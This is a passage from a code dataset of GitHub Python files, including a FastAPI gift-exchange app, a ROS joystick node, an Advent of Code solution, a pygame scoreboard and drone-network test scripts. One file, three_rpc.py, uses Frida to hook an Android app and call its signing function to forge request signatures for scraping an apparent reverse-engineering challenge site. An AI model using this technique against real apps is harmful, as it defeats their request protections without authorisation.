groups)\n if tmpAction == -1:\n return JSONResponse(content={\"message\": \"Resource Not Found\"}, status_code=204)\n tmpPerson = findInListByID(id, participants)\n participants.remove(tmpPerson)\n tmppart = findGroupParticipantByID(id1=id, idperson=id2)\n participantsInGroups.remove(tmppart)\n\n\n@app.post(\"/group/{id}/toss\")\nasync def postRaffle(id: int):\n global groups\n tmpAction = findInListByID(id, groups)\n if tmpAction == -1:\n return JSONResponse(content={\"message\": \"Resource Not Found\"}, status_code=204)\n IDparticipants = [item.ParticipantID for item in participantsInGroups if item.GroupID == id]\n\n if len(IDparticipants) < 3:\n return JSONResponse(content={\"message\": \"Conflict\"}, status_code=409)\n\n tmpparticipants = [item for item in participants if item.id in IDparticipants]\n listRes = []\n for i in range(len(tmpparticipants) - 1):\n item = Recipients(Person=tmpparticipants[i],Recipient=tmpparticipants[i+1])\n listRes.append(item)\n recipients.append(item)\n item = Recipients(Person=tmpparticipants[len(tmpparticipants)-1],Recipient=tmpparticipants[0])\n listRes.append(item)\n recipients.append(item)\n return(listRes)\n\n@app.get(\"/group/{groupId}/participant/{participantId}/recipient\")\nasync def getRecipient(groupId: int, participantId: int):\n tmpAction = findInListByID(participantId, participants)\n tmprez = [item for item in recipients if item.Person == tmpAction]\n return tmprez[0].Recipient\n\n\nif __name__ == \"__main__\":\n uvicorn.run(app, host=\"localhost\", port=8080)","repo_name":"peacekeeper228/Olymp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31283434107","text":"#!/usr/bin/env python\nimport rospy\nfrom sensor_msgs.msg import Joy\nfrom nano_drone.msg import sendRC\nfrom std_msgs.msg import Bool\nimport traceback\n\nclass Joy2RCin(object):\n \"\"\"Joy2RCin ROS Node\"\"\"\n def __init__(self):\n # Initialize the Node\n rospy.init_node(\"Joy2RCin\")\n self.msg = sendRC()\n self.msg.channels[0] = 1500\n self.msg.channels[1] = 1500\n self.msg.channels[2] = 1500\n self.msg.channels[3] = 1000\n self.arm = False\n \n # Setup the Joy topic subscription\n self.joy_subscriber = rospy.Subscriber(\"joy\", Joy, self.handleJoyMessage, queue_size=1)\n\n # Setup the Arm topic publisher\n self.arm_pub = rospy.Publisher(\"/pi_drone/arm\", Bool, queue_size=1)\n \n # Setup the Twist topic publisher\n self.rc_publisher = rospy.Publisher(\"/pi_drone/RC_in\", sendRC, queue_size=1)\n rate = rospy.Rate(200) # 200hz\n\n while not rospy.is_shutdown():\n self.rc_publisher.publish(self.msg)\n rate.sleep()\n\n def handleJoyMessage(self, data):\n \"\"\"Handles incoming Joy messages\"\"\"\n self.msg.channels[0] = 1500 - (int)(data.axes[2] * 500)\n self.msg.channels[1] = 1500 + (int)(data.axes[5] * 500)\n self.msg.channels[3] = 1500 + (int)(data.axes[1] * 500)\n self.msg.channels[2] = 1500 - (int)(data.axes[0] * 500)\n\n if(data.buttons[5] == 1):\n if not self.arm:\n self.arm = True\n self.arm_pub.publish(self.arm)\n \n else:\n self.msg.channels[4] = 1000\n self.arm = False\n self.arm_pub.publish(self.arm)\n\n\n### If Main ###\nif __name__ == '__main__':\n try:\n Joy2RCin()\n except:\n rospy.logerr(\"Unhandled Exception in the Joy2RCin\"+\n \" Node:+\\n\"+traceback.format_exc())\n\n","repo_name":"Razbotics/pi_drone_ros","sub_path":"scripts/joy_control.py","file_name":"joy_control.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"48"} +{"seq_id":"37706497745","text":"\"\"\"/proc/fs/nfsd handlers\"\"\"\n\nfrom procfs.core import File, Dict\n\n\nclass pool_stats(File):\n \"\"\"/proc/fs/nfsd/pool_stats\n \"\"\"\n\n def _parse(self, content):\n header, values = content.splitlines()\n keys = header[2:].replace('-', '_').split()\n values = (int(i) for i in values.split())\n return Dict(zip(keys, values))\n","repo_name":"pmuller/procfs","sub_path":"procfs/proc/fs/nfsd.py","file_name":"nfsd.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"48"} +{"seq_id":"73529591507","text":"from utils import read_lines_into_list\nfrom typing import Dict\n\n\nclass Day7:\n\n def __init__(self):\n test_input_path = '../inputs/day07/input_test.txt'\n final_input_path = '../inputs/day07/input.txt'\n self.all_input_paths = [test_input_path, final_input_path]\n\n def main(self):\n for input_path in self.all_input_paths:\n print(f\"\\nInput from: {input_path}\")\n dir_structure = self.parse_input(input_path)\n print(f\"dir structure: {dir_structure}\")\n total_dir_size = self.part1(dir_structure)\n size_of_dir_to_delete = self.part2(dir_structure)\n print(f\"Solution 1: {total_dir_size}\")\n print(f\"Solution 2: {size_of_dir_to_delete}\")\n\n def parse_input(self, file_path):\n list_of_lines = read_lines_into_list(file_path)\n dir_structure, i_inner, current_path = self.parse_lines(list_of_lines)\n return dir_structure\n\n def parse_lines(self, list_of_lines, current_path=\"\"):\n dir_structure = {}\n i = 0\n current_path = current_path\n while i < len(list_of_lines):\n line = list_of_lines[i]\n # cd means start a new key / add a key\n if line == '$ cd ..':\n current_path = '+'.join(current_path.split(\"+\")[:-1])\n return dir_structure, i, current_path\n elif line.startswith('$ cd'):\n\n dir_name = f\"{current_path}+{line[5:]}\"\n current_path = dir_name\n inner_dir_structure, i_inner, current_path = self.parse_lines(list_of_lines[i+1:], current_path)\n dir_structure[dir_name] = inner_dir_structure\n i += i_inner + 1\n elif line.startswith('$ ls'):\n # ls add all the next lines (until next command) to dictionary at this level\n pass\n elif line.startswith('dir'):\n pass # don't need this if you never cd it\n else: # 444 abc.txt means add {abc.text: 444}\n file_size, file_name = line.split(' ')\n dir_structure[file_name] = int(file_size)\n i += 1\n return dir_structure, i, current_path\n\n def part1(self, dir_structure):\n total_dir_size = self.get_total_dir_size_up_to_max_size(dir_structure, max_size=100000)\n return total_dir_size\n\n def part2(self, dir_structure: Dict, needed_space=30000000):\n recursive_dir_sizes = self.get_recursive_dir_sizes_of_all_dirs(dir_structure)\n free_space = self.get_total_free_space(recursive_dir_sizes)\n space_to_free = needed_space - free_space\n sizes_above_min = {}\n for dir_name, dir_size in recursive_dir_sizes.items():\n if dir_size >= space_to_free:\n sizes_above_min[dir_name] = dir_size\n return min(sizes_above_min.values())\n\n def get_total_dir_size_up_to_max_size(self, dir_structure: Dict, max_size):\n sizes_below_max = {}\n recursive_dir_sizes = self.get_recursive_dir_sizes_of_all_dirs(dir_structure)\n for dir_name, dir_size in recursive_dir_sizes.items():\n if dir_size <= max_size:\n sizes_below_max[dir_name] = dir_size\n return sum(sizes_below_max.values())\n\n def get_total_free_space(self, recursive_dir_sizes, total_space=70000000):\n used_space = recursive_dir_sizes['+/']\n free_space = total_space - used_space\n return free_space\n\n def get_recursive_dir_sizes_of_all_dirs(self, dir_structure: dict):\n \"\"\"\n Get recursive dir sizes per directory in nested_dir_structure\n :param dir_structure:\n :return: a flat dictionary with keys directory names and values recursive directory sizes\n \"\"\"\n recursive_dir_sizes = {}\n for dir_or_file, content in dir_structure.items():\n assert type(content) == int or type(content) == dict\n if type(content) == int: # it's a file\n pass\n elif type(content) == dict: # it's a dir\n recursive_size = self.get_total_dir_size_of_topmost_dir(content)\n inner_dir_sizes = self.get_recursive_dir_sizes_of_all_dirs(content)\n recursive_dir_sizes.update(inner_dir_sizes)\n recursive_dir_sizes[dir_or_file] = recursive_size\n return recursive_dir_sizes\n\n def get_total_dir_size_of_topmost_dir(self, dir_structure: dict):\n \"\"\"get total dir size for @param dir_structure\"\"\"\n total_dir_size = 0\n for file_or_dir_name, content in dir_structure.items():\n assert type(content) == int or type(content) == dict\n if type(content) == int:\n total_dir_size += content\n elif type(content) == dict:\n total_dir_size += self.get_total_dir_size_of_topmost_dir(content)\n return total_dir_size\n\n\nif __name__ == '__main__':\n day7_obj = Day7()\n day7_obj.main()\n","repo_name":"clara2911/adventOfCode","sub_path":"src/day07.py","file_name":"day07.py","file_ext":"py","file_size_in_byte":4951,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"29963529186","text":"from re import T\r\nimport pygame.font\r\n\r\n\r\nclass Scoreboard:\r\n \"\"\"A class to report and record scoring info.\"\"\"\r\n\r\n def __init__(self, aa_game):\r\n \"\"\"Initalize Scorekeeping attributes.\"\"\"\r\n self.screen = aa_game.screen\r\n self.screen_rect = self.screen.get_rect()\r\n self.settings = aa_game.setting\r\n self.stats = aa_game.stats\r\n\r\n #Font settings for scoring information.\r\n self.text_color = (255, 255, 255)\r\n self.font = pygame.font.SysFont(None, 48)\r\n \r\n #Prepare the inital score image.\r\n self.prep_score()\r\n\r\n def load_HS(self):\r\n \"\"\"Retrive Highscores.\"\"\"\r\n with open(\"C:/Users/coole/Python Code/Space_Invaders/game_assests/data/game_data.txt\", 'r') as HS_data:\r\n old_hs = HS_data.read()\r\n return float(old_hs) \r\n\r\n def save_HS(self):\r\n if self.highscore <= self.stats.score:\r\n self.highscore = self.stats.score\r\n with open('C:/Users/coole/Python Code/Space_Invaders/game_assests/data/game_data.txt', 'w') as hs_data:\r\n hs_data.write(str(self.highscore))\r\n hs_data.close\r\n\r\n def prep_score(self):\r\n \"\"\"Turn the score into a rendered image.\"\"\"\r\n round = self.stats.round\r\n round_str = \"round: {}\".format(round)\r\n self.round_image = self.font.render(round_str, True,\r\n self.text_color, self.settings.bgColor)\r\n\r\n self.highscore = self.load_HS()\r\n self.rounded_HS = int(self.highscore)\r\n self.HS_str = \"Highscore: {:,}\".format(self.rounded_HS)\r\n self.HS_image = self.font.render(self.HS_str, True,\r\n self.text_color, self.settings.bgColor)\r\n\r\n self.rounded_score = self.stats.score\r\n self.score_str = \"Score: {:,}\".format(self.rounded_score)\r\n self.score_image = self.font.render(self.score_str, True,\r\n self.text_color, self.settings.bgColor)\r\n\r\n #Display the score at the top right of the screen.\r\n self.round_rect = self.round_image.get_rect()\r\n self.round_rect.right = self.round_rect.right + 300\r\n self.round_rect.top = 20\r\n\r\n self.HS_rect = self.HS_image.get_rect()\r\n self.HS_rect.right = self.HS_rect.right + 600\r\n self.HS_rect.top = 20\r\n\r\n self.score_rect = self.score_image.get_rect()\r\n self.score_rect.right = self.score_rect.right + 20\r\n self.score_rect.top = 20\r\n self.save_HS()\r\n\r\n def show_score(self):\r\n \"\"\"Draw score to the screen.\"\"\"\r\n self.screen.blit(self.score_image, self.score_rect)\r\n self.screen.blit(self.HS_image, self.HS_rect)\r\n self.screen.blit(self.round_image, self.round_rect)","repo_name":"dcee-py/Alien_Assault","sub_path":"Space_Invaders/scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39395287882","text":"\"\"\"\n猿人学app 第三题\n此函数传入的的值为: 0141661318660000 1661318659000\n函数执行返回结果为 6f62132a5db2b97f1209cc3d5b638a837253c7bd706313e424cd07692f7073d2\n\n5127426\n\"\"\"\nimport time\nimport frida\nimport requests\nfrom loguru import logger\n\n\ndef my_message_handler(message, payload):\n logger.info(f\"message=>{message}\")\n logger.info(f\"payloa=>{payload}\")\n\n\n# 通过usb连接\ndevice = frida.get_usb_device(10)\nlogger.info(f'设备=>{device}')\n\nsession = device.attach(\"猿人学2022\")\nlogger.info(f'session=>{session}')\n\n# # load script\nwith open(\"../js/three_rpc.js\", encoding=\"utf-8\") as f:\n script = session.create_script(f.read())\nscript.on(\"message\", my_message_handler)\nscript.load()\n\n# 第三题测试用例\n# res = script.exports.invoke_sign_three(\"0141661318660000\", 1661318659000)\n# print(res)\n\n\ndef get_url():\n headers = {\n 'Host': 'appmatch.yuanrenxue.com',\n 'accept-language': 'zh-CN,zh;q=0.8',\n 'user-agent': 'Mozilla/5.0 (Linux; U; Android 11; zh-cn; M2010J19SC Build/RKQ1.201004.002) AppleWebKit/533.1 (KHTML, like Gecko) Version/5.0 Mobile Safari/533.1',\n 'content-type': 'application/x-www-form-urlencoded; charset=utf-8',\n 'cache-control': 'no-cache',\n }\n total = 0\n for page in range(1, 101):\n logger.info(f\"开始请求第:{page}页\")\n ctime = int(time.time() * 1000)\n cstr = f\"{page}{ctime}\".zfill(16)\n sign = script.exports.invoke_sign_three(cstr, ctime)\n data = {\n 'page': page,\n 'm': sign\n }\n response = requests.post('https://appmatch.yuanrenxue.com/app3', headers=headers, data=data)\n data_list = response.json().get(\"data\")\n for one in data_list:\n val = one.get(\"value\").strip()\n total += int(val)\n logger.info(f\"total:{total}\")\n\n\nif __name__ == '__main__':\n get_url()","repo_name":"ppwang06/app_yuanrenxue","sub_path":"cal_result/three_rpc.py","file_name":"three_rpc.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7161211644","text":"import os\nimport numpy as np\nimport pandas as pd\nimport cv2\nimport argparse\nimport time\nimport shutil\n\nfrom dda.simulation import FlightmareSimulation\nfrom dda.learner import ControllerLearning\nfrom dda.config.settings import create_settings\n\nfrom gazesim.models.utils import image_softmax\n\n\ndef save_trajectory_data(time_stamps, output_file, mpc_actions, network_actions,\n states, network_used, save_path, extra_info=None):\n data = {\n \"time-since-start [s]\": time_stamps,\n \"throttle_mpc\": mpc_actions[:, 0],\n \"roll_mpc\": mpc_actions[:, 1],\n \"pitch_mpc\": mpc_actions[:, 2],\n \"yaw_mpc\": mpc_actions[:, 3],\n \"throttle_nw\": network_actions[:, 0],\n \"roll_nw\": network_actions[:, 1],\n \"pitch_nw\": network_actions[:, 2],\n \"yaw_nw\": network_actions[:, 3],\n \"position_x [m]\": states[:, 0],\n \"position_y [m]\": states[:, 1],\n \"position_z [m]\": states[:, 2],\n \"rotation_w [quaternion]\": states[:, 3],\n \"rotation_x [quaternion]\": states[:, 4],\n \"rotation_y [quaternion]\": states[:, 5],\n \"rotation_z [quaternion]\": states[:, 6],\n \"velocity_x [m/s]\": states[:, 7],\n \"velocity_y [m/s]\": states[:, 8],\n \"velocity_z [m/s]\": states[:, 9],\n \"omega_x [rad/s]\": states[:, 10],\n \"omega_y [rad/s]\": states[:, 11],\n \"omega_z [rad/s]\": states[:, 12],\n \"network_used\": np.array(network_used).astype(int)\n }\n if extra_info is not None:\n data.update(extra_info)\n data = pd.DataFrame(data)\n data.to_csv(os.path.join(save_path, \"{}.csv\".format(output_file)), index=False)\n\n\ndef find_paths(model_load_path, trajectory_path):\n # it is assumed that the file structure is the same as that which DDA creates\n\n # expand vars in the paths, so that the same file can be used on multiple machines with the same file structure\n new_mlp = []\n for mlp in model_load_path:\n new_mlp.append(os.path.expandvars(mlp))\n model_load_path = new_mlp\n\n # root directory (to save everything in as well)\n root_dirs = []\n for mlp in model_load_path:\n # take care of getting the right files outside of this if dirs are specified\n root_dirs.append(os.path.abspath(os.path.join(mlp, os.pardir, os.pardir)))\n # root_dir = os.path.abspath(os.path.join(model_load_path, os.pardir, os.pardir))\n\n # get the actual files to load from\n model_load_path_no_ext = []\n for mlp in model_load_path:\n model_load_path_no_ext.append(os.path.splitext(mlp)[0])\n # model_load_path_no_ext = os.path.splitext(model_load_path)[0]\n\n # settings file\n settings_files = []\n for rd in root_dirs:\n for file in os.listdir(rd):\n if file.endswith(\".yaml\"):\n settings_files.append(os.path.join(rd, file))\n break\n # settings_file = None\n # for file in os.listdir(root_dir):\n # if file.endswith(\".yaml\"):\n # settings_file = os.path.join(root_dir, file)\n # break\n\n # save dir for the test trajectories\n save_dirs = []\n for rd, sf in zip(root_dirs, settings_files):\n model_name = os.path.basename(sf)\n model_name = model_name.split(\".\")[0].replace(\"snaga_\", \"\")\n save_dirs.append(os.path.join(rd, f\"dda_{model_name}\"))\n # model_name = os.path.basename(settings_file)\n # model_name = model_name.split(\".\")[0].replace(\"snaga_\", \"\")\n # save_dir = os.path.join(root_dir, f\"dda_{model_name}\")\n\n # figure out whether it is a single trajectory or multiple\n trajectory_paths = []\n if os.path.isfile(trajectory_path) and trajectory_path.endswith(\".csv\"):\n trajectory_paths.append(os.path.abspath(trajectory_path))\n elif os.path.isdir(trajectory_path):\n for file in os.listdir(trajectory_path):\n if file.startswith(\"trajectory\") and file.endswith(\".csv\"):\n trajectory_paths.append(os.path.abspath(os.path.join(trajectory_path, file)))\n else:\n raise FileNotFoundError(\"Path '{}' is not a valid trajectory file or folder\".format(trajectory_path))\n\n return root_dirs, model_load_path_no_ext, settings_files, save_dirs, trajectory_paths\n\n\ndef main(args):\n root_dirs, model_load_paths_no_ext, settings_files, save_dirs, trajectory_paths = find_paths(\n args.model_load_path, args.trajectory_path)\n\n \"\"\"\n from pprint import pprint\n pprint(root_dirs)\n print()\n pprint(model_load_paths_no_ext)\n print()\n pprint(settings_files)\n print()\n pprint(save_dirs)\n\n root_dirs = root_dirs[:2]\n model_load_paths_no_ext = model_load_paths_no_ext[:2]\n settings_files = settings_files[:2]\n save_dirs = save_dirs[:2]\n \"\"\"\n\n # want to keep the same simulation instance if this is to be used on snaga\n # (where disconnecting from the Unity application leads to an error), therefore\n # use it for all models/trajectories (the timeout should be set accordingly)\n simulation = None\n\n print(settings_files)\n\n # TODO: also record\n # - gaze prediction + 3D vector\n # - drone velocity is already recorded I guess\n # - maybe current reference though? for plotting the reference trajectory?\n # - current high-level-label\n\n # loop over all models\n experiments_total = len(root_dirs) * len(trajectory_paths) * args.repetitions\n experiments_counter = 0\n for root_dir, model_load_path_no_ext, settings_file, save_dir in zip(\n root_dirs, model_load_paths_no_ext, settings_files, save_dirs):\n model_start = time.time()\n print(\"\\n[Testing] Starting testing for '{}'\\n\".format(root_dir))\n\n # create the directory to save the outputs in if it doesn't exist already\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n # copy the settings file to the save directory\n shutil.copy(settings_file, save_dir)\n\n # create and modify settings\n settings = create_settings(settings_file, mode=\"dagger\", generate_log=False)\n settings.resume_training = True\n settings.resume_ckpt_file = model_load_path_no_ext\n settings.gpu = args.gpu\n settings.flightmare_pub_port = args.pub_port\n settings.flightmare_sub_port = args.sub_port\n settings.max_time = 1000.0\n if args.offline_evaluation:\n settings.start_buffer = 1000.0\n if args.record_extra_info:\n settings.return_extra_info = True\n\n # using \"learner\" as controller\n controller = ControllerLearning(settings, trajectory_paths[0], mode=\"testing\", max_time=settings.max_time)\n\n if simulation is None:\n # create simulation (do it here so we don't disconnect and mess things up on snaga)\n simulation = FlightmareSimulation(settings, trajectory_paths[0], max_time=settings.max_time)\n\n # connect to the simulation either at the start or after training has been run\n simulation.connect_unity(settings.flightmare_pub_port, settings.flightmare_sub_port)\n\n # wait until Unity rendering/image queue has calmed down\n for _ in range(50):\n simulation.flightmare_wrapper.get_image()\n time.sleep(0.1)\n else:\n # hopefully this works as intended, in principle nothing should change for all models we are testing for\n # but if this is changed later, that might not be the case (similar to the track type being set)\n simulation.update_config(settings)\n\n # test for each specified trajectory:\n for trajectory_path in trajectory_paths:\n trajectory_start = time.time()\n print(\"\\n[Testing] Starting testing for '{}'\\n\".format(trajectory_path))\n\n # determine the directory to save the output in\n trajectory_name = os.path.basename(trajectory_path)\n trajectory_name = trajectory_name.split(\".\")[0]\n trajectory_dir = os.path.join(save_dir, trajectory_name)\n if not os.path.exists(trajectory_dir):\n os.makedirs(trajectory_dir)\n\n # copy the original trajectory file to that folder for reference\n shutil.copyfile(trajectory_path, os.path.join(trajectory_dir, \"original.csv\"))\n\n # update the simulation and learner, which contain trajectory samplers/planners\n simulation.update_trajectory(trajectory_path, max_time=settings.max_time)\n controller.update_trajectory(trajectory_path, max_time=settings.max_time)\n\n # repeatedly fly the current trajectory\n for repetition in range(args.repetitions):\n experiments_counter += 1\n repetition_start = time.time()\n print(\"\\n[Testing] Starting repetition {} ({}/{})\\n\".format(\n repetition, experiments_counter, experiments_total))\n\n # file name(s)\n if args.output_file is not None:\n output_file = \"{}_{:02d}\".format(args.output_file, repetition)\n else:\n if args.offline_evaluation:\n output_file = \"mpc_nw_act_{:02d}\".format(repetition)\n else:\n output_file = \"mpc2nw_mt-{:02d}_st-{:02d}_{:02d}\".format(\n int(simulation.total_time * 10), int(settings.start_buffer * 10), repetition)\n\n writer = None\n if args.save_video:\n writer = cv2.VideoWriter(\n os.path.join(trajectory_dir, \"{}.mp4\".format(output_file)),\n cv2.VideoWriter_fourcc(\"m\", \"p\", \"4\", \"v\"),\n settings.base_frequency,\n (simulation.flightmare_wrapper.image_width, simulation.flightmare_wrapper.image_height),\n True,\n )\n\n fts_writer = None\n if args.save_feature_track_video:\n fts_writer = cv2.VideoWriter(\n os.path.join(trajectory_dir, \"fts_{}.mp4\".format(output_file)),\n cv2.VideoWriter_fourcc(\"m\", \"p\", \"4\", \"v\"),\n settings.image_frequency,\n (simulation.flightmare_wrapper.image_width, simulation.flightmare_wrapper.image_height),\n True,\n )\n\n att_writer = None\n if args.save_attention_video:\n att_writer = cv2.VideoWriter(\n os.path.join(trajectory_dir, \"att_{}.mp4\".format(output_file)),\n cv2.VideoWriter_fourcc(\"m\", \"p\", \"4\", \"v\"),\n settings.base_frequency,\n (simulation.flightmare_wrapper.image_width, simulation.flightmare_wrapper.image_height),\n True,\n )\n\n all_features = {}\n colors = np.random.randint(0, 255, (controller.feature_tracker.max_features_to_track, 3))\n\n # data to record\n time_stamps = []\n states = []\n mpc_actions = []\n network_actions = []\n network_used = []\n extra_info = None\n if args.record_extra_info:\n extra_info = []\n\n # whether to use the network instead of the MPC\n use_network = False\n\n # resetting everything\n trajectory_done = False\n info_dict = simulation.reset()\n controller.reset()\n controller.use_network = use_network\n controller.record_data = False\n controller.update_info(info_dict)\n controller.prepare_network_command()\n controller.prepare_expert_command()\n action = controller.get_control_command()\n\n # run the main loop until the simulation \"signals\" that the trajectory is done\n while not trajectory_done:\n # decide whether to switch to network at the current time\n if info_dict[\"time\"] > settings.start_buffer:\n use_network = True\n controller.use_network = use_network\n\n # print(info_dict[\"reference\"][:3])\n\n # record states\n time_stamps.append(info_dict[\"time\"])\n states.append(info_dict[\"state\"])\n\n # record actions\n mpc_actions.append(action[\"expert\"] if not use_network or args.record_mpc_actions\n else np.array([np.nan] * 4))\n network_actions.append(action[\"network\"])\n network_used.append(action[\"use_network\"])\n\n if info_dict[\"update\"][\"image\"] and args.save_feature_track_video:\n current_image = info_dict[\"image\"].copy()\n mask = np.zeros_like(current_image)\n current_features = controller.feature_tracks\n\n # for f_idx, f in enumerate(current_features):\n for f_id, feat in current_features.items():\n point = tuple(((feat[0:2] + 1) / 2 * np.array([800.0, 600.0])).astype(int))\n if f_id not in all_features:\n all_features[f_id] = [point]\n else:\n all_features[f_id].append(point)\n\n # TODO: only iterate over the stuff that's in the current dict\n # for f_idx, f in enumerate(current_features):\n color_idx = 0\n for f_id, feat in current_features.items():\n points = all_features[f_id]\n for i in range(len(points) - 1):\n mask = cv2.line(mask, (points[i][0], points[i][1]),\n (points[i + 1][0], points[i + 1][1]),\n colors[color_idx].tolist(), 2)\n current_image = cv2.circle(\n current_image, (points[-1][0], points[-1][1]), 5, colors[color_idx].tolist(), -1)\n color_idx += 1\n\n # pprint(controller.feature_tracks)\n # print()\n current_image = cv2.add(current_image, mask)\n # cv2.imshow(\"frame\", current_image)\n # cv2.waitKey(0)\n fts_writer.write(current_image)\n\n if args.record_extra_info:\n extra_info.append(controller.extra_info.copy())\n\n if args.save_video:\n writer.write(info_dict[\"image\"])\n\n if args.save_attention_video:\n att = controller.extra_info[\"out_attention\"]\n att = image_softmax(att)\n att = att.cpu().detach().numpy().squeeze()\n if att.max() != 0:\n att /= att.max()\n att = (att * 255).astype(\"uint8\")\n att = np.repeat(att[np.newaxis, :, :], 3, axis=0).transpose((1, 2, 0))\n att[:, :, :-1] = 0\n att = cv2.resize(att, (800, 600))\n att = cv2.addWeighted(info_dict[\"image\"], 1.0, att, 1.0, 0)\n att_writer.write(att)\n\n # perform the step(s) in the simulation and get the new action\n info_dict = simulation.step(action[\"network\"] if action[\"use_network\"] else action[\"expert\"])\n if use_network and not args.record_mpc_actions:\n info_dict[\"update\"][\"expert\"] = False\n\n trajectory_done = info_dict[\"done\"]\n if not trajectory_done:\n controller.update_info(info_dict)\n if not settings.save_at_net_frequency or info_dict[\"update\"][\"command\"]:\n action = controller.get_control_command()\n\n # prepare data\n states = np.vstack(states)\n mpc_actions = np.vstack(mpc_actions)\n network_actions = np.vstack(network_actions)\n\n if args.record_extra_info:\n extra_info = {k: [d[k] for d in extra_info] for k in extra_info[0]}\n\n if args.save_video:\n writer.release()\n\n if args.save_feature_track_video:\n fts_writer.release()\n\n if args.save_attention_video:\n att_writer.release()\n\n # save the data\n # trajectory_dir = \"/home/simon/Desktop/weekly_meeting/meeting21/debug_weird_nw_pred\"\n save_trajectory_data(time_stamps, output_file, mpc_actions, network_actions,\n states, network_used, trajectory_dir, extra_info)\n\n print(\"\\n[Testing] Finished repetition {} in {:.2f}s ({}/{})\\n\".format(\n repetition, time.time() - repetition_start, experiments_counter, experiments_total))\n\n print(\"\\n[Testing] Finished testing for '{}' in {:.2f}s\\n\".format(\n trajectory_path, time.time() - trajectory_start))\n\n print(\"\\n[Testing] Finished testing for '{}' in {:.2f}s\\n\".format(root_dir, time.time() - model_start))\n\n if simulation is not None:\n simulation.disconnect_unity()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Test Network\", fromfile_prefix_chars=\"@\")\n parser.add_argument(\"-mlp\", \"--model_load_path\", type=str, nargs=\"+\", required=True,\n help=\"Path(s) to model checkpoint. Can be listed in a plain text file and \"\n \"read from the file by specifying '@filename' for this argument.\")\n parser.add_argument(\"-tp\", \"--trajectory_path\", type=str, required=True, help=\"Path to trajectory/trajectories\")\n parser.add_argument(\"-of\", \"--output_file\", type=str, help=\"Output file name other than default trajectory\")\n parser.add_argument(\"-rep\", \"--repetitions\", type=int, default=20, help=\"Repetitions for testing\")\n parser.add_argument(\"-pp\", \"--pub_port\", type=int, default=10253, help=\"Flightmare publisher port\")\n parser.add_argument(\"-sp\", \"--sub_port\", type=int, default=10254, help=\"Flightmare subscriber port\")\n parser.add_argument(\"-g\", \"--gpu\", type=int, default=0, help=\"GPU to run networks on\")\n parser.add_argument(\"-rma\", \"--record_mpc_actions\", action=\"store_true\", help=\"Whether or not to do this\")\n parser.add_argument(\"-off\", \"--offline_evaluation\", action=\"store_true\",\n help=\"Whether or not to evaluate the trained model 'offline', i.e. using the MPC to \"\n \"fly the trajectory, but evaluating the model is done during training and \"\n \"recording its actions.\")\n parser.add_argument(\"-xi\", \"--record_extra_info\", action=\"store_true\",\n help=\"Whether or not to record extra info, e.g. from attention branching (only one \"\n \"implemented right now) or feature tracks or IMU.\")\n parser.add_argument(\"-sv\", \"--save_video\", action=\"store_true\",\n help=\"Whether or not to save the frames as a video.\")\n parser.add_argument(\"-sftv\", \"--save_feature_track_video\", action=\"store_true\",\n help=\"Whether or not to save the frames with feature tracks as a video.\")\n parser.add_argument(\"-sav\", \"--save_attention_video\", action=\"store_true\",\n help=\"Whether or not to save the frames attention predictions overlaid as a video. \"\n \"Note that this option was only used temporarily to create some visualisations and \"\n \"for it to work some of the rest of the code was changed as well. The latter changes \"\n \"have now been reversed, thus this will not actually work.\")\n\n main(parser.parse_args())\n","repo_name":"uzh-rpg/VAPAR","sub_path":"flightmare/flightil/dda/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":20355,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"22106727900","text":"import argparse\nimport os\nimport json\nimport gym\nimport time\nimport pickle\nimport logging\nimport sys\n\n# add this dictionary to python env path:\nbase_path = os.getcwd()\nsys.path.append(base_path)\n\nfrom h_agent import H_agent\nfrom lm_agent import lm_agent\n\ngym.envs.registration.register(\n id='transport_challenge_MA',\n entry_point='tdw_gym:TDW'\n)\n\nclass Challenge:\n def __init__(self, logger, port, data_path, output_dir, number_of_agents = 2, max_frames = 3000, launch_build = True, screen_size = 512, data_prefix = 'dataset/nips_dataset/', gt_mask = True, save_img = True):\n self.env = gym.make(\"transport_challenge_MA\", port = port, number_of_agents = number_of_agents, save_dir = output_dir, max_frames = max_frames, launch_build = launch_build, screen_size = screen_size, data_prefix = data_prefix, gt_mask = gt_mask)\n self.gt_mask = gt_mask\n self.logger = logger\n self.logger.debug(port)\n self.logger.info(\"Environment Created\")\n self.output_dir = output_dir\n self.max_frames = max_frames\n self.save_img = save_img\n self.data = json.load(open(os.path.join(data_prefix, data_path), \"r\"))\n self.logger.info(\"done\")\n\n def submit(self, agents, logger, eval_episodes):\n total_finish = 0.0\n if eval_episodes[0] == -1:\n eval_episodes = range(len(self.data))\n num_eval_episodes = len(eval_episodes)\n\n start = time.time()\n results = {}\n for i, episode in enumerate(eval_episodes):\n start_time = time.time()\n if os.path.exists(os.path.join(self.output_dir, str(episode), 'result_episode.json')):\n with open(os.path.join(self.output_dir, str(episode), 'result_episode.json'), 'r') as f:\n result = json.load(f)\n total_finish += result['finish'] / result['total']\n results[episode] = result\n continue\n # The episode has been evaluated before\n\n if not os.path.exists(os.path.join(self.output_dir, str(episode))):\n os.makedirs(os.path.join(self.output_dir, str(episode)))\n self.logger.info('Episode {} ({}/{})'.format(episode, i + 1, num_eval_episodes))\n self.logger.info(f\"Resetting Environment ... data is {self.data[episode]}\")\n state, info, env_api = self.env.reset(seed=self.data[episode]['seed'], options=self.data[episode], output_dir = os.path.join(self.output_dir, str(episode)))\n for id, agent in enumerate(agents):\n if type(env_api) == list:\n curr_api = env_api[id]\n else: curr_api = env_api\n if info['goal_description'] is not None:\n if agent.agent_type == 